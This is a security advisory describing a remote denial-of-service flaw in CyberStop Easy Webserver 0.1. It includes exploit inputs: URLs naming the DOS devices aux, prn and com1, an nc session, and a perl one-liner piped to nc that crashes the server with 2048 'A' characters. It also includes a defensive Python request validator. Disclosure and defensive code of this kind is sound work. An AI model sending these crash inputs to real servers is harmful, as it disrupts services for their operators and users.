|
Title
|
CyberStop Web Server Remote DoS
|
|
ID
|
SYBSEC-ADV09
|
|
Severity
|
LOW - Denial of Service
|
|
History
|
15.JAN.2002 Vulnerability discovered
22.JAN.2002 Vendor contacted
|
|
Scope
|
Application Denial of Service
|
|
Platforms
|
Any Win32 platform
|
|
Author
|
|
|
URL
|
http://www.sybsecurity.com/advisors/SYBSEC-ADV09-CyberStop_Web_Server_Remote_DoS
|
|
Release
|
Public
|
|
Overview
|
CyberStop web server can transform a normal PC into a web server.
|
|
Affected versions
|
The vulnerability has been reported in the following version of the Cyberstop web server:
Cyberstop Easy Webserver 0.1
|
|
Description
|
By embedding a DOS device name in the URL, remote attackers can cause a denial of service
against the server.
|
|
Workaround
|
|
|
Acknowledgments
|
|
|
References
|
|
|
Details
|
DoS exploit 1:
A denial of service can be caused in the product by issuing one of the following requests:

    http://www.example.com/aux
    http://www.example.com/prn
    http://www.example.com/com1

    sh-2.04# nc -vvn 10.0.0.1 80
    (UNKNOWN) [10.0.0.1] 80 (?) open
    GET /aux HTTP/1.0

In addition, it is possible to crash the server remotely by sending a large number of 'A' characters to the web server's port.

Exploit:

    $ perl -e ' for ($i=1;$i<2049;$i++) { print "A";} ' | nc 10.0.0.1 80
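
A server-side check for both inputs described above, as an added example that is not part of the original advisory or the vendor's code: it rejects URL paths containing a reserved DOS device name and caps the request-line length before any file is opened. The function names, the 1024-byte limit, the status codes and the sample requests are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# The advisory demonstrates aux, prn and com1; the rest of this set is the
# standard Win32 reserved device-name list (added here, not from the advisory).
RESERVED = {"con", "prn", "aux", "nul",
            *(f"com{i}" for i in range(1, 10)),
            *(f"lpt{i}" for i in range(1, 10))}

MAX_REQUEST_LINE = 1024  # assumed limit; the advisory's crash input is 2048 bytes


def is_device_segment(segment: str) -> bool:
    """True if a path segment should be treated as a DOS device name."""
    # Be conservative: ignore trailing dots/spaces and anything after the first
    # dot or colon, so "aux.txt", "AUX." and "com1:" are all treated as devices.
    base = re.split(r"[.:]", segment.rstrip(" ."), maxsplit=1)[0]
    return base.strip().lower() in RESERVED


def check_request_line(raw: bytes):
    """Return (status, reason) for a raw HTTP request line."""
    if len(raw) > MAX_REQUEST_LINE:
        return 414, "request line too long"
    parts = raw.decode("latin-1").strip().split(" ")
    if len(parts) not in (2, 3):
        return 400, "malformed request line"
    # Decode percent-escapes first so "/c%6Fm1" is seen as "/com1".
    path = unquote(parts[1].split("?", 1)[0])
    for seg in re.split(r"[/\\]", path):
        if is_device_segment(seg):
            return 403, f"reserved device name in path: {seg!r}"
    return 200, "ok"


# Constructed sample requests (not captured traffic).
SAMPLES = [b"GET /aux HTTP/1.0\r\n", b"GET /docs/PRN.txt HTTP/1.0\r\n",
           b"GET /c%6Fm1 HTTP/1.0\r\n", b"GET /auxiliary/index.html HTTP/1.0\r\n",
           b"A" * 2048]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(check_request_line(sample), sample[:40])
```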
|
|
Exploit tool
|
|